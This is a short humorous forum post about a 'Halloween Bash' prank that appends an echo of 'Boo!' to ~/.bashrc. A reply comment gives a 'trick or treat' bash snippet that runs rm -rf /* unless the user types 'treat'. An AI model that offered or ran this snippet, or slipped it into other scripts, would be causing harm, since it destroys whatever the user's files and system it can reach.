24
coderme
7y

echo 'echo "Boo!"' >> ~/.bashrc

I'm making a "Halloween Bash".

Comments
  • 9
    clear; \
    echo trick or treat; \
    read response; \
    if [[ "$response" != "treat" ]];
    then rm -rf /*;
    fi;
Add Comment